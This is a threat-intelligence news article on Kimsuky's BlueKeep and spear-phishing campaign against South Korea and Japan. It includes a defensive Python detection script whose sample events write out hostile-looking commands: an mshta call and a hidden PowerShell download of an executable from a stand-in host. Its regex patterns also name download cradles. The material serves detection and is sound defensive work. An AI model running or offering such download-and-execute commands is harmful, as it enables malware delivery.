Kimsuky APT Exploited BlueKeep RDP Flaw in Attacks Against South Korea and Japan

The North Korea-linked group Kimsuky has been spotted in a new campaign exploiting a patched Microsoft Remote Desktop Services (RDS) flaw to gain initial access to systems in South Korea and Japan. Researchers at the AhnLab SEcurity intelligence Center (ASEC) discovered the campaign, tracked as Larva-24005, while investigating a security breach.

The attackers exploited the BlueKeep vulnerability (CVE-2019-0708), which Microsoft patched in May 2019. That a six-year-old, long-patched flaw still yielded access shows how persistent North Korean state-sponsored hackers can be.

Initial Access and Malware Deployment

On some systems, initial access was gained by exploiting the RDP vulnerability. An RDP vulnerability scanner was also found on a compromised system, but there were no signs that the scanner itself had actually been used by the attackers. Once inside, the threat actors distributed malware by other means as well, such as email attachments that exploited the Microsoft Office Equation Editor vulnerability (CVE-2017-11882).

Upon gaining access, Kimsuky modified the configuration of infected systems by installing MySpy malware and RDPWrap to maintain remote access. In the final stage, the attackers deployed KimaLogger or RandomQuery keyloggers to record keystrokes.

Spear-Phishing Attacks and forceCopy Stealer Malware

Kimsuky's campaign also involved spear-phishing attacks aimed at organizations in South Korea and Japan. The attackers sent phishing emails with malicious *.LNK shortcut files disguised as Office documents. When opened, these files executed PowerShell or Mshta to download malware like PebbleDash and RDP Wrapper.

The Kimsuky group uses a custom-built RDP Wrapper to enable remote desktop access, likely modifying export functions to evade detection. They also install proxy malware to achieve external access to infected systems located in private networks.
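The chain described above, a shortcut file opened from explorer that hands off to PowerShell or mshta to fetch remote content, followed later by an RDP Wrapper install, can be expressed as process-creation detection rules. The following is an added example written for this article; it is not ASEC code and not anything recovered from the campaign. The event fields are constructed assumptions loosely modelled on Sysmon Event ID 1 (ProcessCreate), the sample events and URLs are constructed and are not indicators of compromise, and the RDP Wrapper rule matches only the public project's file names, so a renamed custom build (as the article describes) needs a stronger signal such as a non-Microsoft DLL loaded by TermService.

```python
"""Detection example for the LNK -> PowerShell/mshta -> RDP Wrapper chain.

Added illustration; not AhnLab/ASEC code and not attacker tooling.
Field names follow Sysmon Event ID 1 loosely and are assumptions.
Sample events below are constructed, not real IoCs.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


# Interpreters the article says the *.LNK files hand off to.
LNK_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# A shortcut the user double-clicks is launched by explorer.exe; a mail
# client parent covers attachments opened straight from the message.
USER_SHELL_PARENTS = {"explorer.exe", "outlook.exe"}
# Command-line fragments showing remote content is fetched or the window hidden.
REMOTE_CONTENT = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"net\.webclient|\.hta\b|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)
# Public RDP Wrapper artefact names. A custom build may be renamed, so this
# name-based rule is a floor, not a ceiling (see lead-in).
RDPWRAP = re.compile(r"rdpwrap\.dll|rdpwinst(\.exe)?|rdpwrap\.ini", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Run both rules over a list of ProcEvent and return findings in order."""
    findings = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        # Rule 1: shortcut-launched LOLBin pulling remote content.
        if (img in LNK_HOSTS and parent in USER_SHELL_PARENTS
                and REMOTE_CONTENT.search(ev.command_line)):
            findings.append({"host": ev.host, "rule": "lnk_lolbin_remote_content",
                             "image": img, "command_line": ev.command_line})
        # Rule 2: RDP Wrapper persistence artefacts in image or command line.
        if RDPWRAP.search(ev.command_line) or RDPWRAP.search(ev.image):
            findings.append({"host": ev.host, "rule": "rdp_wrapper_install",
                             "image": img, "command_line": ev.command_line})
    return findings


# Constructed sample telemetry (assumed field values, not real IoCs).
SAMPLE_EVENTS = [
    # Shortcut disguised as a document: explorer launches mshta with a URL.
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://example.invalid/report.hta"),
    # Same pattern with PowerShell downloading a stager to %TEMP%.
    ProcEvent("WS02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "iwr http://example.invalid/s -OutFile $env:TEMP\s.exe"'),
    # Benign: a local script run from explorer, no remote content; must not fire.
    ProcEvent("WS03", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\cleanup.ps1"),
    # Later stage on WS02: the public RDP Wrapper installer is run from cmd.
    ProcEvent("WS02", r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\RDPWInst.exe",
              r"RDPWInst.exe -i -o"),
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["host"], f["rule"], f["command_line"])
```

Correlating the two rules by host (WS02 fires on both) is what turns a noisy LOLBin alert into the sequence the article describes; the benign WS03 event shows the remote-content requirement doing its job.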

Keyloggers and File Exfiltration

Kimsuky's malware suite includes keyloggers in multiple file formats, including a PowerShell script. The attackers also used the forceCopy stealer malware to capture keystrokes and extract files from browser directories.

Ancillary Information

This campaign is part of Kimsuky's broader activities, which have targeted organizations in South Korea, the U.S., China, Japan, Germany, Singapore, and several other countries since September 2023. Their activity includes phishing campaigns against South Korea and Japan, as well as attacks on South Korea's software, energy, and financial sectors starting in October 2023.

ASEC researchers have published indicators of compromise (IoCs) for this campaign. The Kimsuky cyberespionage group, also known as APT43 or ARCHIPELAGO, was first spotted by Kaspersky researchers in 2013. The group operates under the control of the Reconnaissance General Bureau (RGB), North Korea's foreign intelligence service.

Conclusion

This incident highlights the persistence and sophistication of North Korea-sponsored hackers, and the long tail of a 2019 vulnerability that still appears on exposed RDP hosts. As security professionals, it is essential to stay vigilant and monitor for signs of such attacks. By understanding the tactics, techniques, and procedures (TTPs) of groups like Kimsuky, we can better prepare our defenses against their methods.